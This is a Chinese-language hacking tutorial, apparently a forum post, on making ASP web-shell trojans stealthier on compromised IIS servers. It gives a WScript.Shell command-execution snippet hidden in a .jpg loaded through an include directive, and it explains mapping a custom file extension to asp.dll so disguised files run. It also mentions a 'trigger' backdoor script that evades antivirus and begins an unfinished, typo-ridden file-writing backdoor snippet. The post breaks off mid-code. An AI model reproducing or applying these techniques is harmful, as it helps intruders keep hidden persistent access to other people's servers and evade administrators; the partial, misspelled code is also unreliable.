脚本入侵中往往会上传一个ASP木马来进一步扩大权限 或者在肉鸡中留ASP后门也是一个不错的选择但是如何让ASP木马如何更加隐匿而强大了??
让它躲过查杀?
并且具备SYSTEM权限?
改变代码变量也许是一个解决问题的办法,但是我们不如换个角度思考!!
改变ASP木马的运行方式!!!
任意后缀运行ASP木马
首先我们换个任意的后缀来运行ASP木马,方法有2种 如下
第一种
INCLUDE指令的使用,它可以让我们直接调用位于其他文件的函数 而不管后缀名是什么,象一个简单的ASP木马 功能是遍历C:盘 原码如下
<%Set oScript = Server.CreateObject("WSCRIPT.SHELL")oScript.run("cmd.exe /c dir c:\>c:\lcx.txt"%>
我们可以将这段代码保存为1,jpg然后将着句指令<!--#include file="1.jpg-->放在2.ASP文件的文件头或文件尾.那么我们执行2.ASP时 放在2.ASP同目录下的1,jpg同样也会被调用 起到遍历C的功能即在C:生成Icx.txt这个文件
第二种
用ASP.DLL解析 在IIs默认安装的情况下我们可查觉asa cer cdx后缀也可以成功运行ASP代码,因为这3种后缀的文件映射都是调用了系统的ASP.DLL 根据这个启示我们可以做一个.icx的后缀映射用 nt\system32下的asp.dll来解析 这样做完了写有ASP的源码的ICX后缀文件也会成功运行ASP程序
打开控制面板 管理工具 INTERNET服务管理器 WEB站点 右键属性 主目录 配置 添加
触发ASP木马
其次,我们可以让ASP木马来触发才运行。无论你的ASP木马写的多么好,基本总会调用到WSCRIPT.SHELL和Scripting.FileSystemObject这2个对象有经验的网管可以运行查找功能,让你木马无处可逃我们能不能做到调用这2个对象的ASP木马不放在肉鸡上 需要时能够随时的上传运行了?runasp.asp是一个用ASP实现ASP文件的运行脚本 虽然还有很多的BUG 但是对我们在调用执行.asp木马是足够的了 更为可怕的是我在runasp.asp里调试一些恶意代码时 居然可以躲过瑞星的查杀
代码就不列出了
我们将runasp.asp放在肉鸡上是不是一个很好的ASP触发器后门了??另外,对付粗心的网管我们还可以将这样的一段代码放在ASP的文件里
〈%
on error resume next
id=requst("id")
if requst("id")=l then
testfile=request.form("neme")
msg=request.form("message")
set fs=server.createObject("scripting.filesytemobject")
set thisfile=fs.OpenTextFile(testfile,8,true,o)
thisfile.writeline(""&msg&"")
.........
...........
由于时间关系现在就写到这里 有时间在继续
